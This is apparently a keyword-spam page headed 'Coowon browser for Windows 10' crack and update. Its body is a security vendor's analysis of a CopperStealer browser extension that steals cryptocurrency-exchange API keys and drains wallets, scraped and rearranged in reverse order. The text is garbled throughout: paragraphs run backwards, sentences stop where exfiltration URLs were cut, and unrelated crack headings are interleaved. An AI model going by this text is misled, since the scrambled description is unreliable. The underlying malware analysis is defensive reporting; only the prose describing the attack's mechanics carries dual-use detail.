- COOWON BROWSER FOR WINDOWS 10 UPDATE
- COOWON BROWSER FOR WINDOWS 10 ARCHIVE
- COOWON BROWSER FOR WINDOWS 10 CODE
- COOWON BROWSER FOR WINDOWS 10 CRACK
If successful, the background script then continues with extracting two API keys (API Key and API Secret) from the “API key details” form, saves them to Chromium’s local storage for later use, and exfiltrates them to If API authentication is not successful, a “retryApi” message is sent to content script.
COOWON BROWSER FOR WINDOWS 10 CODE
If the wallet balance is non-zero, it attempts to send 85% of the available funds to the attacker-controlled wallet.Īfterward, one needs to insert one more authentication code and a form with the newly generated API keys is displayed. If the request is successful, the API sends “okApi” message to content script and starts parsing for wallet information.The result of this request is also exfiltrated to Uses the API to get information about wallets, addresses, and balances by requesting /api/v2/accounts.These parameters are needed for the following steps: This method tries to obtain the API key ( apiKey) and API secret ( apiSecret) from Chrome’s local storage if these key-secret pairs were previously obtained and saved. The background script listens for the following methods: The message is in JSON format, with one of the name-value pair called method. Afterward, the extension starts onMessage listener to listen for messages sent from either an extension process or a content script. Tether (USDT, specifically in Ethereum ERC20 and TRON TRC20)įor ETH addresses, the script hardcodes about 170 additional ERC20-based tokens.Then the extension defines an array of the threat actor’s addresses for various cryptocurrencies and tokens for: The second query is a POST request to /traffic/domain, wherein the data contains the domains of cryptocurrency-related websites based on the cookies found in the machine: The first one is a GET request to likely for statistical purposes. When the extension starts, the background script makes two queries. We also noted that the extension was installed to the victims’ browsers with two different extension IDs, and neither can be found on the official Chrome Web Store:Īfter the extension’s installation, we also noticed the following newly installed extension in chrome://extensions/.īoth obfuscation steps can be deobfuscated by using custom automation scripts.Īnalyzing the scripts, this section breaks down how the cybercriminals are able to steal the account information of legitimate cryptocurrency wallet users. We analyzed that the targeted browsers are Chromium-based and include: Finally, the browser restarts so the newly installed extension becomes active.
COOWON BROWSER FOR WINDOWS 10 ARCHIVE
The files from the crx.7z archive are then extracted into the extension’s directory located in. A newly installed extension is also added to the extension installation allow list located in the registry. For a newly installed extension, the content of crx.json file is inserted into this Secure Preferences settings file. Meanwhile, the file named Secure Preferences is also in JSON format and contains the installed extension’s settings. The extension installer switches off browser notifications. The file, named Preferences, is in JSON format and contains individual user settings. The extension installer first modifies the files Preferences and Secure Preferences in the Chromium-based browser‘s User Data directory. Malicious Chrome browser extensions are usually packaged this way. After decrypting and unpacking, we noticed a resource directory named CRX containing a 7-Zip archive. This component uses the same cryptor described in previous posts in the first stage, followed by the second stage wherein the decrypted DLL is Ultimate Packer Executables-(UPX) packed. This bundle is compressed into a password-protected archive and has been distributed in the wild since July. The component is usually distributed in one dropper together with a browser stealer and bundled with other unrelated pieces of malware.
COOWON BROWSER FOR WINDOWS 10 CRACK
Similar to previous routines, this new component is spread via fake crack (also known as warez) websites. These API keys allow the extension to perform transactions and send cryptocurrencies from victims’ wallets to the attackers’ wallets. Tracking the cybercriminal group’s latest activities, we found a malicious browser extension capable of creating and stealing API keys from infected machines when the victim is logged in to a major cryptocurrency exchange website. We published our analyses on CopperStealer distributing malware by abusing various components such as browser stealer, adware browser extension, or remote desktop.
COOWON BROWSER FOR WINDOWS 10 UPDATE
Update ( 2:05AM EST): We have updated the list of IOCs and detections.
0 kommentar(er)
